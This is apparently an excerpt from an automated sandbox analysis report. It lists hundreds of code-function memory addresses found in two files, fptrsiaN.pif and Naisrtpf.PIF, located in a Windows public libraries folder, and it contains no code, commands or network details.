Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9728	6_2_211C9728
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C5428	6_2_211C5428
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3229	6_2_211C3229
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CED2A	6_2_211CED2A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C6C20	6_2_211C6C20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CC221	6_2_211CC221
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CE85F	6_2_211CE85F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3B58	6_2_211C3B58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C6758	6_2_211C6758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1B58	6_2_211C1B58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CBD58	6_2_211CBD58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CD550	6_2_211CD550
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0950	6_2_211C0950
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9250	6_2_211C9250
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1248	6_2_211C1248
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CAA48	6_2_211CAA48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3B48	6_2_211C3B48
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C674A	6_2_211C674A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0040	6_2_211C0040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C7F40	6_2_211C7F40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CD541	6_2_211CD541
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C4478	6_2_211C4478
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C7A78	6_2_211C7A78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2477	6_2_211C2477
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CD077	6_2_211CD077
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CE870	6_2_211CE870
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CA571	6_2_211CA571
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1B68	6_2_211C1B68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CBD68	6_2_211CBD68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C7A68	6_2_211C7A68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C4467	6_2_211C4467
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0960	6_2_211C0960
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9260	6_2_211C9260
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C759F	6_2_211C759F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C4D98	6_2_211C4D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2D98	6_2_211C2D98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CE399	6_2_211CE399
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C6290	6_2_211C6290
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CFB90	6_2_211CFB90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CB890	6_2_211CB890
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2488	6_2_211C2488
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CD088	6_2_211CD088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C4D8A	6_2_211C4D8A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C8D87	6_2_211C8D87
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CA580	6_2_211CA580
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C6281	6_2_211C6281
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CFB81	6_2_211CFB81
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0DB8	6_2_211C0DB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CA0B8	6_2_211CA0B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C5DB8	6_2_211C5DB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CF6BA	6_2_211CF6BA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C36B7	6_2_211C36B7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C75B0	6_2_211C75B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CCBB0	6_2_211CCBB0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C0DB2	6_2_211C0DB2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C2DA8	6_2_211C2DA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CE3A8	6_2_211CE3A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CA0A8	6_2_211CA0A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CB8A0	6_2_211CB8A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C16D8	6_2_211C16D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CB3D8	6_2_211CB3D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C70D8	6_2_211C70D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3FD7	6_2_211C3FD7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C04D0	6_2_211C04D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C88D0	6_2_211C88D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CDED1	6_2_211CDED1
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C36C8	6_2_211C36C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C5DC8	6_2_211C5DC8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CF6C8	6_2_211CF6C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CB3C8	6_2_211CB3C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C04C9	6_2_211C04C9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C16C7	6_2_211C16C7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CCBC0	6_2_211CCBC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C88C2	6_2_211C88C2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CAEFF	6_2_211CAEFF
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1FF8	6_2_211C1FF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CC6F8	6_2_211CC6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C83F8	6_2_211C83F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C48F7	6_2_211C48F7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9BF0	6_2_211C9BF0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C58F0	6_2_211C58F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CF1F0	6_2_211CF1F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C3FE8	6_2_211C3FE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C70E8	6_2_211C70E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C1FE8	6_2_211C1FE8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CC6E7	6_2_211CC6E7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211CDEE0	6_2_211CDEE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_211C9BE1	6_2_211C9BE1
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120EFF8	6_2_2120EFF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207618	6_2_21207618
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21200E98	6_2_21200E98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120ECD8	6_2_2120ECD8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207928	6_2_21207928
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120DD38	6_2_2120DD38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207938	6_2_21207938
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120AB38	6_2_2120AB38
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21200508	6_2_21200508
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120F318	6_2_2120F318
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120C118	6_2_2120C118
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21208F18	6_2_21208F18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120E378	6_2_2120E378
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207F78	6_2_21207F78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120B178	6_2_2120B178
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120F958	6_2_2120F958
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209558	6_2_21209558
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120C758	6_2_2120C758
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212085A7	6_2_212085A7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212085B8	6_2_212085B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120E9B8	6_2_2120E9B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120B7B8	6_2_2120B7B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209B90	6_2_21209B90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120CD98	6_2_2120CD98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209B98	6_2_21209B98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21208BF8	6_2_21208BF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120BDF8	6_2_2120BDF8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212009C2	6_2_212009C2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212009D0	6_2_212009D0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120A1D8	6_2_2120A1D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120D3D8	6_2_2120D3D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120F638	6_2_2120F638
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209238	6_2_21209238
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120C438	6_2_2120C438
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207608	6_2_21207608
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21200012	6_2_21200012
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120DA18	6_2_2120DA18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120A818	6_2_2120A818
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120FC68	6_2_2120FC68
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120FC78	6_2_2120FC78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120CA78	6_2_2120CA78
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209878	6_2_21209878
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21200040	6_2_21200040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120E058	6_2_2120E058
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21207C58	6_2_21207C58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120AE58	6_2_2120AE58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21209EB8	6_2_21209EB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120D0B8	6_2_2120D0B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21200E87	6_2_21200E87
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120B488	6_2_2120B488
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120E698	6_2_2120E698
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21208298	6_2_21208298
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120B498	6_2_2120B498
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120D6F8	6_2_2120D6F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120A4F8	6_2_2120A4F8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212004FA	6_2_212004FA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212088D8	6_2_212088D8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2120BAD8	6_2_2120BAD8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2121E1C8	6_2_2121E1C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21216440	6_2_21216440
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2121CA90	6_2_2121CA90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21216120	6_2_21216120
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21212F20	6_2_21212F20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21214500	6_2_21214500
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21211300	6_2_21211300
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21213560	6_2_21213560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210360	6_2_21210360
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21214B40	6_2_21214B40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21211940	6_2_21211940
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2121034F	6_2_2121034F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21213BA0	6_2_21213BA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212109A0	6_2_212109A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21215180	6_2_21215180
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21211F80	6_2_21211F80
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212141E0	6_2_212141E0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210FE0	6_2_21210FE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212157C0	6_2_212157C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212125C0	6_2_212125C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21214820	6_2_21214820
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21211620	6_2_21211620
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2121F428	6_2_2121F428
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21212C00	6_2_21212C00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21215E00	6_2_21215E00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210013	6_2_21210013
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2121F418	6_2_2121F418
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21214E60	6_2_21214E60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21211C60	6_2_21211C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21213240	6_2_21213240
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210040	6_2_21210040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212154A0	6_2_212154A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212122A0	6_2_212122A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21213880	6_2_21213880
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210680	6_2_21210680
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21215AE0	6_2_21215AE0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212128E0	6_2_212128E0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21213EC0	6_2_21213EC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21210CC0	6_2_21210CC0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212203B8	6_2_212203B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212226B8	6_2_212226B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21220AB8	6_2_21220AB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21222DB8	6_2_21222DB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212211B8	6_2_212211B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21225198	6_2_21225198
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_2122369C	6_2_2122369C
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212218B8	6_2_212218B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21221FB8	6_2_21221FB8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21220006	6_2_21220006
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21220040	6_2_21220040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212203A8	6_2_212203A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212226A9	6_2_212226A9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21220AA8	6_2_21220AA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21222DA7	6_2_21222DA7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212211A8	6_2_212211A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_212218AA	6_2_212218AA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_2_21221FA9	6_2_21221FA9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00408C60	6_1_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_0040DC11	6_1_0040DC11
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00407C3F	6_1_00407C3F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00418CCC	6_1_00418CCC
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00406CA0	6_1_00406CA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_004028B0	6_1_004028B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_0041A4BE	6_1_0041A4BE
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00408C60	6_1_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00418244	6_1_00418244
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00401650	6_1_00401650
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00402F20	6_1_00402F20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_004193C4	6_1_004193C4
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00418788	6_1_00418788
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00402F89	6_1_00402F89
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_00402B90	6_1_00402B90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 6_1_004073A0	6_1_004073A0
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_028920B4	9_2_028920B4
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_0289CECD	9_2_0289CECD
Source: C:\Users\Public\Libraries\Naisrtpf.PIF	Code function: 9_2_0289CFC7	9_2_0289CFC7
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_0040DC11	10_2_0040DC11
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00407C3F	10_2_00407C3F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00418CCC	10_2_00418CCC
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00406CA0	10_2_00406CA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_004028B0	10_2_004028B0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_0041A4BE	10_2_0041A4BE
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00418244	10_2_00418244
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00401650	10_2_00401650
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00402F20	10_2_00402F20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_004193C4	10_2_004193C4
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00418788	10_2_00418788
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00402F89	10_2_00402F89
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_00402B90	10_2_00402B90
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_004073A0	10_2_004073A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3D490	10_2_24A3D490
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3B4C0	10_2_24A3B4C0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3B7A0	10_2_24A3B7A0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3F0C8	10_2_24A3F0C8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A341EA	10_2_24A341EA
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3B1DF	10_2_24A3B1DF
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3BD61	10_2_24A3BD61
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A35E58	10_2_24A35E58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3AF00	10_2_24A3AF00
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A38F18	10_2_24A38F18
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A35820	10_2_24A35820
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3BA7F	10_2_24A3BA7F
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3AA58	10_2_24A3AA58
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3D480	10_2_24A3D480
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3E5E8	10_2_24A3E5E8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3E5D9	10_2_24A3E5D9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A33068	10_2_24A33068
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_24A3AC20	10_2_24A3AC20
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF3510	10_2_25BF3510
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF8568	10_2_25BF8568
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF7820	10_2_25BF7820
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFD400	10_2_25BFD400
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF0040	10_2_25BF0040
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF0740	10_2_25BF0740
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF0E40	10_2_25BF0E40
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE9B8	10_2_25BFE9B8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE9A8	10_2_25BFE9A8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFB598	10_2_25BFB598
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFB58A	10_2_25BFB58A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFB9F0	10_2_25BFB9F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFB9E2	10_2_25BFB9E2
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE108	10_2_25BFE108
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF3501	10_2_25BF3501
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE560	10_2_25BFE560
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF8558	10_2_25BF8558
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE551	10_2_25BFE551
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFDCB0	10_2_25BFDCB0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFDCA0	10_2_25BFDCA0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF7088	10_2_25BF7088
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFE0F9	10_2_25BFE0F9
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF7078	10_2_25BF7078
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFD858	10_2_25BFD858
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFD84A	10_2_25BFD84A
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFCFA8	10_2_25BFCFA8
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFCF98	10_2_25BFCF98
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFD3F0	10_2_25BFD3F0
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BF0731	10_2_25BF0731
Source: C:\Users\Public\Libraries\fptrsiaN.pif	Code function: 10_2_25BFFB18	10_2_25BFFB18
